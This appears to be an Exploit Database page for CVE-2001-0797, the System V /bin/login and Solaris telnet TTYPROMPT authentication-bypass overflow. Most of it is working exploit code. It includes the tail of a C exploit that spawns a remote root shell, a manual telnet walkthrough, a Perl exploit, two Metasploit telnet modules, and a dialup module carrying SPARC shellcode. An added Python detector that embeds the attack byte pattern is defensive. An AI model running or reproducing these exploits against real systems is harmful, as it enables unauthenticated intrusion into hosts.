		fatalerr("error", "Most likely not vulnerable", fd);

	fprintf(stderr, "# password prompt received, waiting for shell\n");

	if (send(fd, "pass\n", 5, 0) < 0)
		fatalerr("send", strerror(errno), fd);

	/* wait for shell prompt */
	memset(buf, 0, sizeof(buf));
	found = 0;

	while (net_read(fd, buf, sizeof(buf), timeout)) {
		if (strstr(buf, "# ") != NULL) {
			found = 1;
			break;
		}
		memset(buf, 0, sizeof(buf));
	}

	if (!found)
		fatalerr("error", "Most likely not vulnerable", fd);

	/* connect to the remote shell */
	fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
	shell(fd);

	exit(0);
}

/*
 * exploit_addchar(): char translation for pam (ripped from scut)
 */
int exploit_addchar(unsigned char *ww, unsigned char wc)
{
	unsigned char * wwo = ww;

	switch (wc) {
	case ('\\'):
		*ww++ = '\\';
		*ww++ = '\\';
		break;
	case (0xff):
	case ('\n'):
	case (' '):
	case ('\t'):
		*ww++ = '\\';
		*ww++ = ((wc & 0300) >> 6) + '0';
		*ww++ = ((wc & 0070) >> 3) + '0';
		*ww++ = (wc & 0007) + '0';
		break;
	default:
		*ww++ = wc;
		break;
	}

	return (ww - wwo);
}

/*
 * fatalerr(): error handling routine
 */
void fatalerr(char *func, char *error, int fd)
{
	fprintf(stderr, "%s: %s\n", func, error);
	close(fd);
	exit(1);
}

/*
 * net_connect(): simple network connect with timeout
 */
int net_connect(char *host, int port, int timeout)
{
	int			fd, i, flags, sock_len;
	struct sockaddr_in	sin;
	struct timeval		tv;
	fd_set			fds;

	/* allocate a socket */
	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	/* bind a privileged port (FIXME) */
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);

	for (i = 1023; i > 0; i--) {
		sin.sin_port = htons(i);
		if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
			break;
	}

	if (i == 0)
		fatalerr("error", "Can't bind a privileged port (must be root)", fd);

	/* resolve the peer address */
	sin.sin_port = htons(port);
	if (!(sin.sin_addr.s_addr = net_resolve(host)))
		fatalerr("error", "Can't resolve hostname", fd);

	/* set non-blocking */
	if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
		fatalerr("fcntl", strerror(errno), fd);
	if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	/* connect to remote host */
	if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
		if (fcntl(fd, F_SETFL, flags) < 0)
			fatalerr("fcntl", strerror(errno), fd);
		return(fd);
	}

	if (errno != EINPROGRESS)
		fatalerr("error", "Can't connect to remote host", fd);

	/* set timeout */
	tv.tv_sec = timeout;
	tv.tv_usec = 0;

	/* setup select structs */
	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select */
	if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
		fatalerr("error", "Can't connect to remote host", fd);

	/* check if connected */
	sock_len = sizeof(sin);
	if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
		fatalerr("error", "Can't connect to remote host", fd);

	if (fcntl(fd, F_SETFL, flags) < 0)
		fatalerr("fcntl", strerror(errno), fd);

	return(fd);
}

/*
 * net_read(): non-blocking read from fd
 */
int net_read(int fd, char *buf, int size, int timeout)
{
	fd_set		fds;
	struct timeval	wait;
	int		n = -1;

	/* set timeout */
	wait.tv_sec = timeout;
	wait.tv_usec = 0;

	memset(buf, 0, size);

	FD_ZERO(&fds);
	FD_SET(fd, &fds);

	/* select with timeout */
	if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
		perror("select");
		exit(1);
	}

	/* read data if any */
	if (FD_ISSET(fd, &fds))
		n = read(fd, buf, size);

	return n;
}

/*
 * net_resolve(): simple network resolver
 */
int net_resolve(char *host)
{
	struct in_addr	addr;
	struct hostent	*he;

	memset(&addr, 0, sizeof(addr));

	if ((addr.s_addr = inet_addr(host)) == -1) {
		if (!(he = (struct hostent *)gethostbyname(host)))
			return(0);
		memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
	}

	return(addr.s_addr);
}

/*
 * sc_copy(): copy the shellcode, using exploit_addchar()
 */
int sc_copy(unsigned char *buf, char *str, long len)
{
	unsigned char	*or = buf;
	int		i;

	for(i = 0; i < len; i++)
		buf += exploit_addchar(buf, str[i]);

	return(buf - or);
}

/*
 * set_val(): copy a dword inside a buffer
 */
void set_val(char *buf, int pos, int val)
{
	buf[pos] = (val & 0xff000000) >> 24;
	buf[pos + 1] = (val & 0x00ff0000) >> 16;
	buf[pos + 2] = (val & 0x0000ff00) >> 8;
	buf[pos + 3] = (val & 0x000000ff);
}

/*
 * shell(): semi-interactive shell hack
 */
void shell(int fd)
{
	fd_set	fds;
	char	tmp[128];
	int	n;

	/* quote Hvar 2004 */
	fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");

	/* execute auto commands */
	write(1, "# ", 2);
	write(fd, CMD, strlen(CMD));

	/* semi-interactive shell */
	for (;;) {
		FD_ZERO(&fds);
		FD_SET(fd, &fds);
		FD_SET(0, &fds);

		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			perror("select");
			break;
		}

		/* read from fd and write to stdout */
		if (FD_ISSET(fd, &fds)) {
			if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
				fprintf(stderr, "Goodbye...\n");
				break;
			}
			if (write(1, tmp, n) < 0) {
				perror("write");
				break;
			}
		}

		/* read from stdin and write to fd */
		if (FD_ISSET(0, &fds)) {
			if ((n = read(0, tmp, sizeof(tmp))) < 0) {
				perror("read");
				break;
			}
			if (write(fd, tmp, n) < 0) {
				perror("write");
				break;
			}
		}
	}

	close(fd);
	exit(1);
}

void usage(char *progname)
{
	fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
	fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
	fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
	fprintf(stderr, "-d\t\tturn on debug mode\n\n");
	exit(1);
}

// milw0rm.com [2004-12-24]
Exploit Database EDB-ID : 57

Publication date : 2002-11-01 23h00 +00:00
Author : Jonathan S.
EDB Verified : Yes

Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require any code to be compiled by an attacker. The vulnerability only requires the attacker to simply define the environment variable TTYPROMPT to a 6-character string, inside telnet. Jonathan believes this overflows an integer inside login, which specifies whether the user has been authenticated (just a guess).

Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).

Example:

    coma% telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o localhost
    SunOS 5.8
    bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    Last login: whenever
    $ whoami
    bin

# milw0rm.com [2002-11-02]
Exploit Database EDB-ID : 21179

Publication date : 2003-01-08 23h00 +00:00
Author : snooq
EDB Verified : Yes

source: https://www.securityfocus.com/bid/3681/info

The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH. Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'. Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.

#!/usr/bin/perl
#
# Date: 09/01/2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# I coded this script to demo how to login to a Solaris box without
# password as 'bin'. Nothing new, it's an old bug which dates back
# to Dec 2001.
#
# And, there are already several versions of exploits circulating
# in the wild for at least a year now.
#
# Due to uninformed/incompetent/ignorant sysadmins, there are still
# quite a number of vulnerable machines out there.
#
# 'root' remote login is not allowed by default. So, unless, it's
# a misconfigured box, you can only go as high as 'bin'. However,
# once you are dropped into a shell, further privilege escalation is
# very possible.
#
# Background info
# ===============
# From http://www.mail-archive.com/[email protected]/msg09281.html
#
# [quote]
# The problem is there exists an authentication flag called the "fflag"
# just after the array that gets overflowed in the .bss segment. This is
# an array of char pointers so when it is overflowed because of an
# mismanagement on the indexing of this array the fflag gets overwritten
# with an valid address on .bss segment. this is good enough to satisfy
# the if(fflag) condition and spawn a shell.
# [/quote]
#
# For more info about this bug, go to:
# http://www.cert.org/advisories/CA-2001-34.html
#
# Disclaimer
# ==========
# This is meant for you to do a quick check on your systems only.
# The author shall not be held responsible for any illegal use
# of this code.
#
# -> some asked 'why code another one?'
# I'm bored.. I guess.... been using other ppl's tools... it's time
# to write my own.. so that I have a reason to feel proud too...
#
# -> again, some asked 'why not in C?'
# ok... I'm lame.. my C sucks... my Perl sucks too...
# I'm not a professional programmer anyway... =p
#
# As usual, any comments or flames, go to jinyean at hotmail.com
#

use Socket;
use FileHandle;

if ($ARGV[0] eq '') {
    print "Usage: $0 <host>\n";
    exit;
}

$payload="\xff\xfc\x18"                               # Won't terminal type
        ."\xff\xfc\x1f"                               # Won't negotiate window size
        ."\xff\xfc\x21"                               # Won't remote flow control
        ."\xff\xfc\x23"                               # Won't X display location
        ."\xff\xfb\x22"                               # Will linemode
        ."\xff\xfc\x24"                               # Won't environment option
        ."\xff\xfb\x27"                               # Will new environment option
        ."\xff\xfb\x00"                               # Will binary transmission
        ."\xff\xfa\x27\x00"                           # My new environ option
        ."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54"   # 'TTYPROMPT'
        ."\x01\x61\x62\x63\x64\x65\x66"               # 'abcdef', any 6 chars will do
        ."\xff\xf0";                                  # Suboption end

$port=23;
$user="bin";                                          # You may change this to another user
$addr=getaddr($ARGV[0]);

for ($i;$i<65;$i++) {
    $user.=" c";                                      # Again, any char will do
}

socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n";
print "Connected. Wait for a shell....\n";

SOCKET->autoflush();

$pid=fork;

if ($pid) {                                           # Parent reads
    send(SOCKET, $payload, 0);
    send(SOCKET, "$user\n", 0);
    read(SOCKET,$buff,69);                            # Read the garbage
    while (<SOCKET>) {
        print STDOUT $_;
    }
}
else {                                                # Child sends
    print SOCKET while (<STDIN>);
    close SOCKET;
}

exit;

sub getaddr {
    my $host=($_[0]);
    my $n=$host;
    $n=~tr/\.//d;
    if ($n=~m/\d+/) {
        return pack('C4',split('\.',$host));
    }
    else {
        return (gethostbyname($host))[4];
    }
}
Exploit Database EDB-ID : 9917

Publication date : 2002-01-17 23h00 +00:00
Author : MC
EDB Verified : Yes

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
      'Description'    => %q{
          This module uses a buffer overflow in the Solaris 'login'
        application to bypass authentication in the telnet daemon.
      },
      'Author'         => [ 'MC', 'cazz' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2001-0797'],
          [ 'OSVDB', '690'],
          [ 'BID', '5531'],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix', 'solaris'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => 'Jan 18 2002',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('USER', [ true, "The username to use", "bin" ]),
      ], self.class)
  end

  def exploit
    connect

    banner = sock.get_once

    print_status('Setting TTYPROMPT...')

    req =
      "\xff\xfc\x18" +
      "\xff\xfc\x1f" +
      "\xff\xfc\x21" +
      "\xff\xfc\x23" +
      "\xff\xfb\x22" +
      "\xff\xfc\x24" +
      "\xff\xfb\x27" +
      "\xff\xfb\x00" +
      "\xff\xfa\x27\x00" +
      "\x00TTYPROMPT" +
      "\x01" + rand_text_alphanumeric(6) +
      "\xff\xf0"

    sock.put(req)

    sleep(0.25)

    print_status('Sending username...')

    filler = rand_text_alpha(rand(10) + 1)
    req << datastore['USER'] + (" #{filler}" * 65)

    sock.put(req + "\n\n\n")

    sleep(0.25)

    sock.get_once

    sock.put(payload.encoded + "\n")

    sleep(0.25)

    handler
  end

end
Exploit Database EDB-ID : 16327

Publication date : 2010-06-21 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: ttyprompt.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
      'Description'    => %q{
          This module uses a buffer overflow in the Solaris 'login'
        application to bypass authentication in the telnet daemon.
      },
      'Author'         => [ 'MC', 'cazz' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9583 $',
      'References'     =>
        [
          [ 'CVE', '2001-0797'],
          [ 'OSVDB', '690'],
          [ 'BID', '5531'],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix', 'solaris'],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => 'Jan 18 2002',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('USER', [ true, "The username to use", "bin" ]),
      ], self.class)
  end

  def exploit
    connect

    banner = sock.get_once

    print_status('Setting TTYPROMPT...')

    req =
      "\xff\xfc\x18" +
      "\xff\xfc\x1f" +
      "\xff\xfc\x21" +
      "\xff\xfc\x23" +
      "\xff\xfb\x22" +
      "\xff\xfc\x24" +
      "\xff\xfb\x27" +
      "\xff\xfb\x00" +
      "\xff\xfa\x27\x00" +
      "\x00TTYPROMPT" +
      "\x01" + rand_text_alphanumeric(6) +
      "\xff\xf0"

    sock.put(req)

    select(nil,nil,nil,0.25)

    print_status('Sending username...')

    filler = rand_text_alpha(rand(10) + 1)
    req << datastore['USER'] + (" #{filler}" * 65)

    sock.put(req + "\n\n\n")

    select(nil,nil,nil,0.25)

    sock.get_once

    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

    select(nil,nil,nil,0.25)

    handler
  end

end
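Both the Perl script and the two Metasploit telnet modules above carry the same on-the-wire signature: a NEW-ENVIRON suboption that defines TTYPROMPT, followed by a login line padded with dozens of extra tokens. The following detector is an added example written for this page by the editor; it is not code from Exploit-DB, snooq or the Metasploit project. It assumes the client-to-server side of a telnet TCP session has already been reassembled into a byte string (for instance from a packet capture), parses the telnet option negotiation per RFC 854 / RFC 1572, and reports both indicators. The sample streams are constructed, and the MAX_LOGIN_TOKENS threshold is an assumed tuning value.

```python
"""Flag CVE-2001-0797 style telnet login attempts in a reassembled
client->server byte stream (editor's example; not Exploit-DB/Metasploit code)."""

# Telnet protocol constants (RFC 854 / RFC 1572)
IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
NEW_ENVIRON = 0x27
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3

# Assumed detection threshold: a legitimate login name is a single token,
# while the exploits above push 60+ extra tokens through the same line.
MAX_LOGIN_TOKENS = 10


def parse_new_environ(body: bytes):
    """Parse a NEW-ENVIRON suboption body (bytes after the 0x27 option byte)
    into (name, value) pairs; value is None when no VALUE followed the name."""
    pairs = []
    name, cur, state = None, bytearray(), None

    def close():
        nonlocal cur, state
        if state == "name":
            pairs.append((bytes(cur), None))
        elif state == "value":
            pairs.append((name, bytes(cur)))
        cur, state = bytearray(), None

    i = 1  # skip the IS / SEND / INFO sub-command byte
    while i < len(body):
        b = body[i]
        if b == ENV_ESC and i + 1 < len(body):  # escaped literal byte
            cur.append(body[i + 1])
            i += 2
            continue
        if b in (ENV_VAR, ENV_USERVAR):
            close()
            state = "name"
        elif b == ENV_VALUE:
            name, cur, state = bytes(cur), bytearray(), "value"
        else:
            cur.append(b)
        i += 1
    close()
    return pairs


def parse_telnet_stream(data: bytes):
    """Strip telnet negotiation from a raw client stream. Returns
    (env_vars, plain_text); env_vars collects every NEW-ENVIRON variable
    the client tried to set, plain_text is what reached the login prompt."""
    env_vars, text, i = [], bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:  # escaped 0xff
            text.append(IAC)
            i += 2
        elif i + 1 < len(data) and data[i + 1] == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break  # truncated suboption: stop parsing
            sub = data[i + 2:end]
            if sub and sub[0] == NEW_ENVIRON:
                env_vars.extend(parse_new_environ(sub[1:]))
            i = end + 2
        elif i + 1 < len(data) and data[i + 1] in (WILL, WONT, DO, DONT):
            i += 3  # command byte plus option byte
        else:
            i += 2  # any other two-byte command
    return env_vars, bytes(text)


def assess_login_attempt(client_bytes: bytes):
    """Return human-readable findings for one client->server telnet stream."""
    env_vars, text = parse_telnet_stream(client_bytes)
    findings = []
    for name, value in env_vars:
        if name.upper() == b"TTYPROMPT":
            findings.append(f"client sets TTYPROMPT={value!r} via NEW-ENVIRON")
    first_line = text.split(b"\n", 1)[0]
    tokens = len(first_line.split())
    if tokens > MAX_LOGIN_TOKENS:
        findings.append(f"login line carries {tokens} tokens "
                        "(extraneous-argument overflow pattern)")
    return findings


# Constructed sample streams, not captured traffic.
BENIGN_SESSION = b"\xff\xfb\x18\xff\xfb\x1f" + b"alice\r\n"
SUSPICIOUS_SESSION = (
    b"\xff\xfc\x18\xff\xfc\x1f\xff\xfc\x21\xff\xfc\x23"
    b"\xff\xfb\x22\xff\xfc\x24\xff\xfb\x27\xff\xfb\x00"
    b"\xff\xfa\x27\x00" b"\x00TTYPROMPT" b"\x01abcdef" b"\xff\xf0"
    + b"bin" + b" c" * 65 + b"\n"
)

if __name__ == "__main__":
    for label, stream in (("benign", BENIGN_SESSION), ("suspicious", SUSPICIOUS_SESSION)):
        print(label, assess_login_attempt(stream) or ["no findings"])
```

Either finding on its own is worth an alert: a telnet client has no legitimate reason to export TTYPROMPT, and a login line with more than a handful of whitespace-separated tokens matches the "large number of arguments" trigger in the CVE description regardless of which exploit produced it. Because the parser skips WILL/WONT/DO/DONT and other suboptions, ordinary terminal-type and window-size negotiation does not produce false positives.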
Exploit Database EDB-ID : 10036

Publication date : 2001-12-11 23h00 +00:00
Author : I)ruid
EDB Verified : Yes

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Dialup

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
      'Description'    => %q{
          This exploit connects to a system's modem over dialup and exploits
        a buffer overflow vulnerability in its System V derived /bin/login.
        The vulnerability is triggered by providing a large number of arguments.
      },
      'References'     =>
        [
          [ 'CVE', '2001-0797'],
          [ 'OSVDB', '690'],
          [ 'OSVDB', '691'],
          [ 'BID', '3681'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
        ],
      'Version'        => '$Revision: 6479 $',
      'Author'         =>
        [
          'I)ruid',
        ],
      'Arch'           => ARCH_TTY,
      'Platform'       => ['unix'],
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          'Space'       => 3000,
          'BadChars'    => '',
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          ['Solaris 2.6 - 8 (SPARC)',
            {
              'Platform'  => 'unix',
              'Ret'       => 0x00027184,
              # Solaris/SPARC special shellcode (courtesy of inode)
              # execve() + exit()
              'Shellcode' =>
                "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
                "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
                "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
                "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
              'NOP'       => "\x90\x1b\x80\x0e",
            }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        # OptString.new('USER', [true, 'User to log in as', 'bin']),
      ], self.class
    )

    deregister_options(
    )
  end

  def buildbuf
    print_status("Targeting: #{self.target.name}")

    retaddr   = self.target.ret
    shellcode = self.target['Shellcode']
    nop       = self.target['NOP']

    user    = datastore['USER']
    command = datastore['COMMAND'] + "\n"

    # prepare the evil buffer
    i = 0
    buf = ''

    # login name
    buf[i,4] = 'bin '
    i += 4

    # return address
    buf[i,4] = [retaddr].pack('N')
    i += 4

    buf[i,1] = ' '
    i += 1

    # trigger the overflow
    (0...60).each {|c|
      buf[i,2] = 'a '
      i += 2
    }

    # padding
    buf[i,4] = ' BBB'
    i += 4

    # nop sled and shellcode
    (0...398).each {|c|
      buf[i,nop.size] = nop
      i += nop.size
    }

    shellcode.each_byte {|b|
      c = b.chr
      case 'c'
      when "\\"
        buf[i,2] = "\\\\"
        i += 2
      when "\xff", "\n", " ", "\t"
        buf[i,1] = "\\"
        buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
        buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
        buf[i+3,1] = ( (b & 0007) + '0').chr
        i += 4
      else
        buf[i,1] = c
        i += 1
      end
    }

    # TODO: need to overwrite/skip the last byte of shellcode?
    #i -= 1

    # padding
    buf[i,4] = 'BBB '
    i += 4

    # pam_handle_t: minimal header
    buf[i,16] = 'CCCCCCCCCCCCCCCC'
    i += 16
    buf[i,4] = [retaddr].pack('N')
    i += 4
    buf[i,4] = [0x01].pack('N')
    i += 4

    # pam_handle_t: NULL padding
    (0...52).each {|c|
      buf[i,4] = [0].pack('N')
      i += 4
    }

    # pam_handle_t: pameptr must be the 65th ptr
    buf[i,9] = "\x00\x00\x00 AAAA\n"
    i += 9

    return buf
  end

  def exploit
    buf = buildbuf

    print_status("Dialing Target")
    if not connect_dialup
      print_error("Exiting.")
      return
    end

    print_status("Waiting for login prompt")
    res = dialup_expect(/ogin:\s/i, 10)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Login prompt not found... Exiting.")
      disconnect_dialup
      return
    end

    # send the evil buffer, 256 chars at a time
    print_status("Sending evil buffer...")
    #puts Rex::Text.to_hex_dump(buf)
    len = buf.length
    p = 0
    while(len > 0) do
      i = len > 0x100 ? 0x100 : len
      #puts Rex::Text.to_hex_dump(buf[p,i])
      dialup_puts(buf[p,i])
      len -= i
      p += i
      # if len > 0
      #   puts Rex::Text.to_hex_dump("\x04")
      #   dialup_puts("\x04") if len > 0
      # end
      sleep 0.5
    end

    # wait for password prompt
    print_status("Waiting for password prompt")
    res = dialup_expect(/assword:/i, 30)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Target is likely not vulnerable... Exiting.")
      disconnect_dialup
      return
    end

    print_status("Password prompt received, waiting for shell")
    dialup_puts("pass\n")
    res = dialup_expect(/#\s/i, 20)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Shell not found.")
      print_error("Target is likely not vulnerable... Exiting.")
      disconnect_dialup
      return
    end

    print_status("Success!!!")

    handler
    disconnect_dialup
  end

end

Products Mentioned

Configuration 0

Sgi>>Irix >> Version 3.2
Sgi>>Irix >> Version 3.3
Sgi>>Irix >> Version 3.3.1
Sgi>>Irix >> Version 3.3.2
Sgi>>Irix >> Version 3.3.3

Configuration 0

Hp>>Hp-ux >> Version 10.00
Hp>>Hp-ux >> Version 10.01
Hp>>Hp-ux >> Version 10.10
Hp>>Hp-ux >> Version 10.20
Hp>>Hp-ux >> Version 10.24
Hp>>Hp-ux >> Version 11.00
Hp>>Hp-ux >> Version 11.0.4
Hp>>Hp-ux >> Version 11.11
Ibm>>Aix >> Version 4.3
Ibm>>Aix >> Version 4.3.1
Ibm>>Aix >> Version 4.3.2
Ibm>>Aix >> Version 4.3.3
Ibm>>Aix >> Version 5.1
Sco>>Openserver >> Version 5.0
Sco>>Openserver >> Version 5.0.1
Sco>>Openserver >> Version 5.0.2
Sco>>Openserver >> Version 5.0.3
Sco>>Openserver >> Version 5.0.4
Sco>>Openserver >> Version 5.0.5
Sco>>Openserver >> Version 5.0.6
Sco>>Openserver >> Version 5.0.6a
Sun>>Solaris >> Version 2.4
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.6
Sun>>Solaris >> Version 7.0
Sun>>Solaris >> Version 8.0
Sun>>Sunos >> Version -
Sun>>Sunos >> Version 5.0
Sun>>Sunos >> Version 5.1
Sun>>Sunos >> Version 5.2
Sun>>Sunos >> Version 5.3
Sun>>Sunos >> Version 5.4
Sun>>Sunos >> Version 5.5
Sun>>Sunos >> Version 5.5.1
Sun>>Sunos >> Version 5.7
Sun>>Sunos >> Version 5.8

References

http://www.cert.org/advisories/CA-2001-34.html
Tags : third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=100844757228307&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/archive/1/246487
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/3681
Tags : vdb-entry, x_refsource_BID
http://xforce.iss.net/alerts/advise105.php
Tags : third-party-advisory, x_refsource_ISS
http://www.kb.cert.org/vuls/id/569272
Tags : third-party-advisory, x_refsource_CERT-VN